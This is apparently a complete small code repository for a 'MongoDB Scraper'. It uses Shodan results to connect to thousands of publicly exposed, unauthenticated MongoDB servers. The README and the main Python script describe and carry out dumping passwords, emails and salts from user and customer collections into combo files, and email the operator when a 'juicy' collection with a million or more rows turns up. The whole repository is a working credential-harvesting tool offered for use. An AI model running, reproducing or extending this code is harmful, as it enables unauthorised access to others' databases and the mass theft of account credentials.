├── .gitignore ├── README.md ├── mongodb-scraper.py ├── parse_data.py └── settings-dist.json /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | data 3 | data_orig.json 4 | ip.py 5 | mongodb-scraper.log* 6 | data.json 7 | data_raw.json 8 | processed.json 9 | passwords*.txt 10 | combo*.txt 11 | settings.json -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MongoDB Scraper 2 | 3 | So accordingly to Shodan, there are more than 30k Mongodb instances publicly available, running on the standard port. Many of them are running with default settings (ie no authentication required). 4 | 5 | What if we start scraping them all and dump the passwords? 6 | 7 | ### Requirements 8 | ``` 9 | pip install pymongo 10 | pip install colorlog 11 | ``` 12 | 13 | ### Usage 14 | First of all create a `data.json` file, including a JSON encoded array of IPs: 15 | ``` 16 | ["123.456.789", "987.654.321"] 17 | ``` 18 | If you have downloaded a report from Shodan, you can easily parse it using the script file `parse_data.py`. 19 | Then simply run the scraper using the following command: 20 | ``` 21 | python mongodb-scaper.py 22 | ``` 23 | 24 | You can supply a comma separate list of IPs as an additional argument `--skip` to manually check some IPs as processed and thus exlude them from the stack 25 | ``` 26 | python mongodb-scraper.py --skip "123.123.123,123.456.789" 27 | ``` 28 | 29 | ### Get alerts on juicy results 30 | If you want to get an email when you find some BIG DUMP (default when there are more than 1M of rows), simply copy the `settings-dist.json` file and rename it to `settings.json`, filling all the fields. 31 | -------------------------------------------------------------------------------- /mongodb-scraper.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import argparse 3 | import logging 4 | import logging.handlers 5 | import json 6 | import re 7 | from colorlog import ColoredFormatter 8 | from pymongo import MongoClient 9 | from pymongo import errors as mongo_errors 10 | import io 11 | import os 12 | import smtplib 13 | from email.mime.text import MIMEText 14 | 15 | 16 | class MongodbScraper: 17 | def __init__(self): 18 | # Init class variables 19 | self.settings = {} 20 | self.ips = [] 21 | self.processed = [] 22 | self.table_names = ['account', 'user', 'subscriber', 'customer'] 23 | self.column_names = ['pass', 'pwd'] 24 | self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}') 25 | self.filename = 'combo.txt' 26 | 27 | # Init the logger 28 | self.logger = logging.getLogger('mongodb-scraper') 29 | self.logger.setLevel(logging.DEBUG) 30 | 31 | # Create a rotation logging, so we won't have and endless file 32 | rotate = logging.handlers.RotatingFileHandler( 33 | 'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3) 34 | rotate.setLevel(logging.DEBUG) 35 | formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s') 36 | rotate.setFormatter(formatter) 37 | 38 | self.logger.addHandler(rotate) 39 | 40 | console = logging.StreamHandler() 41 | console.setLevel(logging.INFO) 42 | 43 | formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S") 44 | console.setFormatter(formatter) 45 | self.logger.addHandler(console) 46 | 47 | # Check that the data dir exists 48 | if not os.path.exists('data'): 49 | os.makedirs('data') 50 | 51 | # Load previous data 52 | self._load_data() 53 | 54 | # Let's parse some CLI options 55 | parser = argparse.ArgumentParser() 56 | parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped') 57 | 58 | arguments = parser.parse_args() 59 | 60 | if arguments.skip: 61 | skip = arguments.skip.split(',') 62 | self.processed += skip 63 | 64 | # Load settings 65 | self._load_settings() 66 | 67 | def _load_data(self): 68 | self.logger.info("Opening data") 69 | 70 | try: 71 | with open('data.json', 'r') as data_json: 72 | self.ips = json.load(data_json) 73 | except (IOError, ValueError): 74 | raise RuntimeError("Please provide a valid JSON encoded file in data.json") 75 | 76 | self.logger.info("Found " + str(len(self.ips)) + " IPs to connect") 77 | 78 | try: 79 | with open('processed.json', 'r') as processed_json: 80 | self.processed = json.load(processed_json) 81 | except (IOError, ValueError): 82 | # Meh, I'll live with that... 83 | pass 84 | 85 | if self.processed: 86 | self.logger.info("Found " + str(len(self.processed)) + " already processed IP") 87 | 88 | def _load_settings(self): 89 | try: 90 | with open('settings.json', 'r') as settings_json: 91 | self.settings = json.load(settings_json) 92 | 93 | self.logger.info("Settings file found") 94 | except (IOError, ValueError): 95 | self.logger.info("Settings file not found") 96 | 97 | def _notify(self, ip, collection, count): 98 | try: 99 | threshold = self.settings['email']['threshold'] 100 | except KeyError: 101 | # No key set 102 | return 103 | 104 | # Result is not interesting enough 105 | if count < threshold: 106 | return 107 | 108 | # Do I have all the required strings? 109 | try: 110 | email_from = self.settings['email']['from'] 111 | email_to = self.settings['email']['to'] 112 | host = self.settings['email']['smtp']['host'] 113 | port = self.settings['email']['smtp']['port'] 114 | user = self.settings['email']['smtp']['user'] 115 | password = self.settings['email']['smtp']['password'] 116 | except KeyError: 117 | return 118 | 119 | # Ok, but are they really set? 120 | if not all([email_from, email_to, host, port, user, password]): 121 | return 122 | 123 | # Ok, we're good to go 124 | body = """ 125 | Hi Dude! 126 | I have just found a juicy collection! 127 | 128 | IP: {0} 129 | Collection: {1} 130 | Rows: {2} 131 | """ 132 | body = body.format(ip, collection, count) 133 | mailer = smtplib.SMTP(host, str(port), timeout=10) 134 | mailer.starttls() 135 | mailer.login(user=user, password=password) 136 | message = MIMEText(body) 137 | 138 | message['Subject'] = 'Juicy collection at ' + ip 139 | message['From'] = email_from 140 | message['To'] = email_to 141 | 142 | try: 143 | mailer.sendmail(email_from, [email_to], message.as_string()) 144 | mailer.quit() 145 | except smtplib.SMTPException: 146 | return 147 | 148 | def _check_datafile(self): 149 | size = 0 150 | 151 | if os.path.exists('data/' + self.filename): 152 | size = os.path.getsize('data/' + self.filename) 153 | 154 | # Did the file grow too large? 155 | if size > (20 * 1024 * 1024): 156 | i = 0 157 | while i < 100: 158 | i += 1 159 | 160 | combo_file = 'combo_' + str(i) + '.txt' 161 | if not os.path.exists('data/' + combo_file): 162 | self.filename = combo_file 163 | break 164 | 165 | def scrape(self): 166 | for ip in self.ips: 167 | # Do I have already processed this IP? 168 | if ip in self.processed: 169 | continue 170 | 171 | self.logger.info("Connecting to " + ip) 172 | 173 | try: 174 | client = MongoClient(ip, connectTimeoutMS=5000) 175 | dbs = client.database_names() 176 | except (KeyboardInterrupt, SystemExit): 177 | return 178 | except: 179 | self.logger.warning("An error occurred while connecting to " + ip + ". Skipping") 180 | # Don't cry if we can't connect to the server 181 | self.processed.append(ip) 182 | continue 183 | 184 | for db in dbs: 185 | # Skip local system databases 186 | if db in ['admin', 'local']: 187 | continue 188 | 189 | self.logger.debug("\t\tAnalyzing db: " + db) 190 | 191 | o_db = client[db] 192 | 193 | try: 194 | collections = o_db.collection_names() 195 | except (KeyboardInterrupt, SystemExit): 196 | return 197 | except Exception: 198 | # Don't cry if something bad happens 199 | self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.") 200 | break 201 | 202 | for collection in collections: 203 | if collection in ['system.indexes']: 204 | continue 205 | 206 | self.logger.debug("\t\tAnalyzing collection: " + collection) 207 | # Is this a collection I'm interested into? 208 | if not any(table in collection for table in self.table_names): 209 | continue 210 | 211 | o_coll = o_db[collection] 212 | 213 | try: 214 | row = o_coll.find_one() 215 | except: 216 | # Sometimes the collection is broken, let's skip it 217 | continue 218 | 219 | interesting = False 220 | 221 | # If the collection is empty I get a null row 222 | if row: 223 | for key, value in row.iteritems(): 224 | # Is that a column we're interested into? 225 | if any(column in key for column in self.column_names): 226 | # Only consider plain strings, nothing fancy 227 | if isinstance(value, basestring): 228 | interesting = True 229 | break 230 | 231 | # This collection has no interesting data? Let's skip it 232 | if not interesting: 233 | continue 234 | 235 | self.logger.info("** Table with interesting data found") 236 | 237 | # Check if the current data file is too large 238 | self._check_datafile() 239 | 240 | # Ok there is interesting data inside it. Let's find if there is an email address, too 241 | # I'll just check the first record and hope there is something similar to an email address. 242 | email_field = '' 243 | salt_field = '' 244 | 245 | for key, value in row.iteritems(): 246 | # If we find anything that resemble an email address, let's store it 247 | if isinstance(value, basestring): 248 | try: 249 | if re.match(self.email_regex, value.encode('utf-8')): 250 | email_field = key 251 | 252 | if 'salt' in key.lower(): 253 | salt_field = key 254 | except UnicodeDecodeError: 255 | pass 256 | 257 | rows = o_coll.find(batch_size=500).max_time_ms(10000) 258 | total = rows.count() 259 | 260 | if total > 750: 261 | self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!") 262 | 263 | self._notify(ip, collection, total) 264 | 265 | lines = [] 266 | counter = 0 267 | 268 | try: 269 | for row in rows: 270 | counter += 1 271 | try: 272 | email = row[email_field].encode('utf-8') 273 | if not email: 274 | email = '' 275 | except: 276 | email = '' 277 | 278 | # Try to fetch the salt, if any 279 | try: 280 | salt = row[salt_field].encode('utf-8') 281 | if not salt: 282 | salt = '' 283 | except: 284 | salt = '' 285 | 286 | for key, value in row.iteritems(): 287 | try: 288 | # Skip fields marked as emails / salt 289 | if key in [email_field, salt_field]: 290 | continue 291 | 292 | # Is that a column we're interested into? 293 | if any(column in key for column in self.column_names): 294 | # Skip empty values 295 | if not value: 296 | continue 297 | 298 | # Skip fields that are not strings (ie reset_pass_date => datetime object) 299 | if not isinstance(value, basestring): 300 | continue 301 | 302 | value = value.encode('utf-8') + ':' + salt 303 | 304 | lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n')) 305 | except UnicodeDecodeError: 306 | # You know what? I'm done dealing with all those crazy encodings 307 | self.logger.warn("An error occurred while encoding the string. Skipping") 308 | continue 309 | 310 | # If I get a very long list, let's write it in batches 311 | if len(lines) >= 1000: 312 | self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records") 313 | with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass: 314 | fp_pass.writelines(lines) 315 | lines = [] 316 | except mongo_errors.ExecutionTimeout: 317 | self.logger.warning("Cursor timed out, skipping") 318 | except mongo_errors.BSONError: 319 | self.logger.warning("Error while fetching cursor data, skipping") 320 | except KeyError: 321 | self.logger.warning("Manually skipping recordset") 322 | except: 323 | self.logger.warning("A generic error occurred while iterating over the cursors. Skipping") 324 | 325 | with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass: 326 | fp_pass.writelines(lines) 327 | 328 | client.close() 329 | self.processed.append(ip) 330 | 331 | with open('processed.json', 'w') as processed_json: 332 | json.dump(self.processed, processed_json) 333 | 334 | 335 | if __name__ == '__main__': 336 | scraper = MongodbScraper() 337 | scraper.scrape() 338 | 339 | -------------------------------------------------------------------------------- /parse_data.py: -------------------------------------------------------------------------------- 1 | import json 2 | 3 | ret = [] 4 | 5 | with open('data_raw.json', 'r') as f: 6 | for line in f: 7 | parser = json.loads(line) 8 | ret.append(parser.get('ip_str')) 9 | 10 | with open('data.json', 'w') as f: 11 | json.dump(ret, f) 12 | -------------------------------------------------------------------------------- /settings-dist.json: -------------------------------------------------------------------------------- 1 | { 2 | "email" : { 3 | "threshold" : 1000000, 4 | "from" : "", 5 | "to" : "", 6 | "smtp" : { 7 | "host" : "", 8 | "port" : "", 9 | "user" : "", 10 | "password" : "" 11 | } 12 | } 13 | } --------------------------------------------------------------------------------